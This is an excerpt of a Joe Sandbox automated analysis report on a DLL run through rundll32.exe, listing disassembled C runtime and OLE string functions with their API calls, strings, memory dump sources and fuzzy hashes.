C:\Windows\SysWOW64\rundll32.exe, xrefs: 615C6B17, 615C6B1E, 615C6B52

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 70b6e1a500bac8b578010fc6fdf41bfd2ae5f3a12c55482937f99e269bfc276e
Instruction ID: fbc2a8e94c6d7e5c3b1e3a65a92534219921fb44a601a45ed628f58089aeb3d6
Opcode Fuzzy Hash: 70b6e1a500bac8b578010fc6fdf41bfd2ae5f3a12c55482937f99e269bfc276e
Instruction Fuzzy Hash: E1416FB5E44359AFDB11DFD9C8809AEFBF8EBC5B14B15806AE414D7300D7719A40CB92

Uniqueness

Uniqueness Score: -1.00%

Function 615CD850, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 615CD95D: _abort.LIBCMT ref: 615CD98A
Part of subcall function 615CD95D: _free.LIBCMT ref: 615CD9BD

Part of subcall function 615CD5E4: GetOEMCP.KERNEL32(00000000,615CD86D,?,?,?), ref: 615CD60F

_free.LIBCMT ref: 615CD8CA
_free.LIBCMT ref: 615CD900

Strings

8!G, xrefs: 615CD953
8!G, xrefs: 615CD883

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free$_abort
String ID: 8!G$8!G
API String ID: 195396716-1103899408
Opcode ID: b952102ea3b59eaf909addbec878ade53b074042e08162468c1562d5167875e5
Instruction ID: 824ef58e5fc74c094e1f915c70244d8b29a5bf4052e3a984458866eb28753ac3
Opcode Fuzzy Hash: b952102ea3b59eaf909addbec878ade53b074042e08162468c1562d5167875e5
Instruction Fuzzy Hash: EC31853194424A9FDB01DFD8D880B9EBBF5EF85724F11849EE914DB290EB359C50CB92

Uniqueness

Uniqueness Score: -1.00%

Function 615A17B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 615A17DD
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 615A182C

Part of subcall function 615B60DA: _Yarn.LIBCPMT ref: 615B60F9
Part of subcall function 615B60DA: _Yarn.LIBCPMT ref: 615B611D

__CxxThrowException@8.LIBVCRUNTIME ref: 615A185E

Strings

bad locale name, xrefs: 615A1848

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: e4f59831e1a48294700bdfaedfc1050c8924f16afe1cf5a307b88aeacd2ddd90
Instruction ID: 5c79d9023c7fd46e573de092afb82eb8d628c8a9caaabe219d735b6e3a34b0c6
Opcode Fuzzy Hash: e4f59831e1a48294700bdfaedfc1050c8924f16afe1cf5a307b88aeacd2ddd90
Instruction Fuzzy Hash: 76119D718147849FD720CFA9C844B4BFBF8EF19714F008A5EE45AD3A81E779A608CB95

Uniqueness

Uniqueness Score: -1.00%

Function 615B7FF4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,615B7876,00000001,00000004,615A224A,00000000,?,615A1D57,615F14C0,615A5700,615F14C4,?,615A224A,00000004,00000001), ref: 615B8078

Strings

ios_base::failbit set, xrefs: 615B7FF7
;\[a, xrefs: 615B8014, 615B805E

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID: ;\[a$ios_base::failbit set
API String ID: 1452528299-717007626
Opcode ID: 583d9ca04b0afc7d0f2ff94ac2b7270aaf4f9d28a8727fdf86ed179156043173
Instruction ID: 09ebab325a3fd1c50e03e8743a8a16c1a8af456283a2eecd2bd2dafb28f4923a
Opcode Fuzzy Hash: 583d9ca04b0afc7d0f2ff94ac2b7270aaf4f9d28a8727fdf86ed179156043173
Instruction Fuzzy Hash: 2A11023264011FEFDF02AFA4CC9459EFB66BF0A390F02C439F92586210DB7098509BD2

Uniqueness

Uniqueness Score: -1.00%

Function 615CA5BB, Relevance: 6.3, APIs: 4, Instructions: 316COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 615CA642

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction ID: 783e45721c5ee5a386e698eaeb8e50b7bacfe0f8b965aca7bf14934c8e19701e
Opcode Fuzzy Hash: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction Fuzzy Hash: 56B12572D452469FE702CFA8C890BAEFFB0EF91B54F14826DD4415B2A1E3388D42C792

Uniqueness

Uniqueness Score: -1.00%

Function 615A8FB0, Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 615A8FE1

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 06a2f837a724db86d6b7f11124633b54eb1c888d83f3ab457b64a4122e8f5dcf
Instruction ID: 682c3a1bd359680e9d1b3b954e5794db50b10cde882f7a68ad09b207987c9fc3
Opcode Fuzzy Hash: 06a2f837a724db86d6b7f11124633b54eb1c888d83f3ab457b64a4122e8f5dcf
Instruction Fuzzy Hash: 83310733B442164BAB08CDADD49556EFBE5EF453B0B11C26EEC15C7244EB32D850C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 615A8E70, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 615A8ECE
SysAllocString.OLEAUT32(?), ref: 615A8F39
_com_issue_error.COMSUPP ref: 615A8F75
_com_issue_error.COMSUPP ref: 615A8F7F

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 6b70f8b01b8aade93cd82b1bff352a5fcbbc90ec4f7e43edc1f621d760d6c2e5
Instruction ID: d1947087c30dfedb8eb383381729b902da1f3d760d0bf7ebfdb6c7fdb2d37ffd
Opcode Fuzzy Hash: 6b70f8b01b8aade93cd82b1bff352a5fcbbc90ec4f7e43edc1f621d760d6c2e5
Instruction Fuzzy Hash: 6331C471A41796DFE7208FA9C840B0EFBE8EF41B11F20C62AEA3597240D774D8408796

Uniqueness

Uniqueness Score: -1.00%

Function 615A8D60, Relevance: 6.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 615A8DC0
_com_issue_error.COMSUPP ref: 615A8DFC
_com_issue_error.COMSUPP ref: 615A8E06
SysFreeString.OLEAUT32(-00000001), ref: 615A8E34

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 6cc9b6aeb80271206ead319f2ae5ed51ad8cacb35f7d98e32523b96183bb17e5
Instruction ID: 21158d193484591b76f98b2c0c86f4e0222ac0a32d7990b3920f3436406d274f
Opcode Fuzzy Hash: 6cc9b6aeb80271206ead319f2ae5ed51ad8cacb35f7d98e32523b96183bb17e5
Instruction Fuzzy Hash: B131D4B1941756DFE7208F99C804B4FFBE8EF41B21F10862AE92497240E7B5D84087D1

Uniqueness

Uniqueness Score: -1.00%

Function 615B32C0, Relevance: 6.1, APIs: 4, Instructions: 75threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(615EFAA4), ref: 615B32CC
GetCurrentThreadId.KERNEL32 ref: 615B32DC
LeaveCriticalSection.KERNEL32(615EFAA4), ref: 615B330C
SetWindowLongW.USER32 ref: 615B335F

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
String ID:
API String ID: 3550545212-0
Opcode ID: b72cf0f6dc6abe54b7467a02185d33c1883d59ddb1d5363ea813126bc35f928f
Instruction ID: 9ef1635e9253f158f224a0d4e4a0303f6a7d7785fe30c0040fc8635b2383b127
Opcode Fuzzy Hash: b72cf0f6dc6abe54b7467a02185d33c1883d59ddb1d5363ea813126bc35f928f
Instruction Fuzzy Hash: 22219632A06516AB9B11DFA6D85491FFBA5FF85760306C51AE819E7300DF30D850DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 615BB590, Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 615BB5AA

Part of subcall function 615BB4F7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 615BB526
Part of subcall function 615BB4F7: ___AdjustPointer.LIBCMT ref: 615BB541

_UnwindNestedFrames.LIBCMT ref: 615BB5BF
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 615BB5D0
CallCatchBlock.LIBVCRUNTIME ref: 615BB5F8

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 99f5f1375799140db52f15b1c32330fc856bd3526b23d2e38b3c450cc77e06b4
Instruction ID: 87d8001e0c162e74d06c703d4a60155080beef51a345bfd0e178cc2fb364b082
Opcode Fuzzy Hash: 99f5f1375799140db52f15b1c32330fc856bd3526b23d2e38b3c450cc77e06b4
Instruction Fuzzy Hash: 5201173210010ABBDF125E96CC91DEFBF6AEF88758F048004FE4896120D776E861ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 615A90C0, Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 615A90C7
VariantCopy.OLEAUT32(?,?), ref: 615A90D1
_com_issue_error.COMSUPP ref: 615A90E3
VariantClear.OLEAUT32 ref: 615A90F1

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Variant$ClearCopyInit_com_issue_error
String ID:
API String ID: 309108855-0
Opcode ID: 962ae2388682ebe9d412382a50d80c55a9ae66b1c5d789ae75fbf7f85f2f63b1
Instruction ID: 4dcd8fe61eecbfd4ca48dac3bf9f68d054b6aae9694d922f02839b955ecbfb7f
Opcode Fuzzy Hash: 962ae2388682ebe9d412382a50d80c55a9ae66b1c5d789ae75fbf7f85f2f63b1
Instruction Fuzzy Hash: B8D01732A501296B9E002AA59808CCABA1DAA47395702C025B621C2100CB76898097A9

Uniqueness

Uniqueness Score: -1.00%

Function 615C93AD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 615C943D

Strings

pow, xrefs: 615C9415, 615C9432

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 50bda4178551c8eaae5188d6814126c0bce95ba2b2b1dfd727ae5cd3625c8528
Instruction ID: 3055e3cb2d2c02c6391f3aaba4f9addb6425d194f311abcc66dcbbd411b6f196
Opcode Fuzzy Hash: 50bda4178551c8eaae5188d6814126c0bce95ba2b2b1dfd727ae5cd3625c8528
Instruction Fuzzy Hash: CE513B61E1960286D702AFE8C58135EFBE4EB81F94F20CD5CE0E581298DB3488C58B4B

Uniqueness

Uniqueness Score: -1.00%

Function 615D560B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,615D5866,?,00000050,?,?,?,?,?), ref: 615D56E6

Strings

ACP, xrefs: 615D5629
OCP, xrefs: 615D565F

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 35404445f336395c3851bd102275158515122f0fb4988f148cecc0bc83746b2f
Instruction ID: 6f94ee953c448e8375d2311beb300f028b5bc5fcdb937e15a90480706eba28a0
Opcode Fuzzy Hash: 35404445f336395c3851bd102275158515122f0fb4988f148cecc0bc83746b2f
Instruction Fuzzy Hash: 1C21F162E65101A6F325CAECA901B8FF6BAEB84B21F56C824E915D7200F732DD00C398

Uniqueness

Uniqueness Score: -1.00%

Function 615CC2B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 615CC2FF
GetFileType.KERNEL32(00000000), ref: 615CC311

Strings

`#G, xrefs: 615CC346

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: FileHandleType
String ID: `#G
API String ID: 3000768030-3783766368
Opcode ID: c3a564dedbe9f1d92aedc3379ab60f392d832493a87774bc8288af3e42f4f1c8
Instruction ID: 0f13b1478b140b2f441b46a0fb5b8a745343d8f9cddf2a487f13547be92f5e0f
Opcode Fuzzy Hash: c3a564dedbe9f1d92aedc3379ab60f392d832493a87774bc8288af3e42f4f1c8
Instruction Fuzzy Hash: 6E1124712087118AD7208DFE988461AFEA5A74BE71B384B1ED0FAD21E1C330D1878242

Uniqueness

Uniqueness Score: -1.00%

Function 615C7F0A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 615C7F38
_free.LIBCMT ref: 615C7F5E

Strings

`#G, xrefs: 615C7F33, 615C7F40, 615C7F59, 615C7F66, 615C7F8C

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free
String ID: `#G
API String ID: 269201875-3783766368
Opcode ID: 72a4d6534dc6e42fe6bc0581a0048cfc0622fd54cbb3db0e9488837f25ef3aac
Instruction ID: 804e4290b9b2dd2bb0d96b25bc95951d9237cf747aea1271b60d948989346aab
Opcode Fuzzy Hash: 72a4d6534dc6e42fe6bc0581a0048cfc0622fd54cbb3db0e9488837f25ef3aac
Instruction Fuzzy Hash: 8E116AB1B243125BEB108EAAECC1B49F6B85781B34F16465AE534CB5D0D770D885C742

Uniqueness

Uniqueness Score: -1.00%

Function 615CF6AF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 615C7625: EnterCriticalSection.KERNEL32(-615F0F0D,?,615CE708,?,615ED460,0000000C), ref: 615C7634

DeleteCriticalSection.KERNEL32(?,?,?,?,?,615ED480,00000010,615C7FF0), ref: 615CF711
_free.LIBCMT ref: 615CF71F

Strings

`#G, xrefs: 615CF6D9, 615CF6EF, 615CF705, 615CF717, 615CF725

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CriticalSection$DeleteEnter_free
String ID: `#G
API String ID: 1836352639-3783766368
Opcode ID: e9b70678d8bbe729c5632796bb683d06c5241334dae6b033126b1cc39da29d49
Instruction ID: 5284c3b7d9ce4909d014f8f01face910044195cd415f31ad7e36615e8b40b392
Opcode Fuzzy Hash: e9b70678d8bbe729c5632796bb683d06c5241334dae6b033126b1cc39da29d49
Instruction Fuzzy Hash: C5118E756203059FDF108FE9D880F9CF7B4AB85728F52814AE464DB2A0CB34E882CF02

Uniqueness

Uniqueness Score: -1.00%

Function 615CE3A1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,615CC243,?,?,00000004), ref: 615CE3EC

Strings

;\[a, xrefs: 615CE3DC
InitializeCriticalSectionEx, xrefs: 615CE3B2, 615CE3BC

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: ;\[a$InitializeCriticalSectionEx
API String ID: 2593887523-4081860117
Opcode ID: 6b871679c2c04b0dd780898e96ce12bf0f8f607658ecf5d1bdf35213667224f6
Instruction ID: acd92eabf64e7ca44cef142317047869e05c832a84094e11a2b853d4f07610d8
Opcode Fuzzy Hash: 6b871679c2c04b0dd780898e96ce12bf0f8f607658ecf5d1bdf35213667224f6
Instruction Fuzzy Hash: 4CF0B431941118FBCF115F92CC05D9EFFA5EB46B50B02C159FC161A210DB315E519B85

Uniqueness

Uniqueness Score: -1.00%

Function 615CE1F3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32(?), ref: 615CE232

Strings

;\[a, xrefs: 615CE228
FlsFree, xrefs: 615CE204, 615CE20E

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Free
String ID: ;\[a$FlsFree
API String ID: 3978063606-836582373
Opcode ID: 0af442d3b3728442ec13de1209b7f97230fd6b2283756cd5544aa20d0be63900
Instruction ID: c3fa5d72157404518723f466ccc0ad6dc3185da88a28678cd2a29eaa5bb331e6
Opcode Fuzzy Hash: 0af442d3b3728442ec13de1209b7f97230fd6b2283756cd5544aa20d0be63900
Instruction Fuzzy Hash: EBE0E572E01118EB8B00AFA78C05A7EFFA5DB8BA10B46815AFC165F200DE314E008FC6

Uniqueness

Uniqueness Score: -1.00%

Function 615CE19D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 615CE1DC

Strings

;\[a, xrefs: 615CE1D2
FlsAlloc, xrefs: 615CE1AE, 615CE1B8

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Alloc
String ID: ;\[a$FlsAlloc
API String ID: 2773662609-556808986
Opcode ID: 135bf43dab1d7c4033f7d74594794ca25353ded5afab708357528c582ad67789
Instruction ID: 0642c0d64412bfaa6d792df1bfed41da33e50359661c6d511da13d063d15f83e
Opcode Fuzzy Hash: 135bf43dab1d7c4033f7d74594794ca25353ded5afab708357528c582ad67789
Instruction Fuzzy Hash: F1E05C30E40604E78B01AFA38C0995EFFA4CB86710B02C11AFC1617200EE311F518BD5

Uniqueness

Uniqueness Score: -1.00%

Function 615C7FE3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 615CF6AF: DeleteCriticalSection.KERNEL32(?,?,?,?,?,615ED480,00000010,615C7FF0), ref: 615CF711
Part of subcall function 615CF6AF: _free.LIBCMT ref: 615CF71F

Part of subcall function 615CF74F: _free.LIBCMT ref: 615CF771

DeleteCriticalSection.KERNEL32(00472340), ref: 615C800C
_free.LIBCMT ref: 615C8020

Strings

`#G, xrefs: 615C7FF2, 615C7FFF, 615C8025

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free$CriticalDeleteSection
String ID: `#G
API String ID: 1906768660-3783766368
Opcode ID: 65e83536db36e6b884a49dff2e0a7e7be2729756797662f9f888914ed8cbf937
Instruction ID: ea492ef91e129dbbd948e5e9f0d7b1ac08db4cdbaeaaa60ac107a8964841bd9a
Opcode Fuzzy Hash: 65e83536db36e6b884a49dff2e0a7e7be2729756797662f9f888914ed8cbf937
Instruction Fuzzy Hash: 8BE092729242618FDF216BAAE880989F3F99BCA719713800AE428D3100CB206CC5CB46

Uniqueness

Uniqueness Score: -1.00%

Function 615BC302, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 615BC317

Strings

;\[a, xrefs: 615BC32A
FlsAlloc, xrefs: 615BC310

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

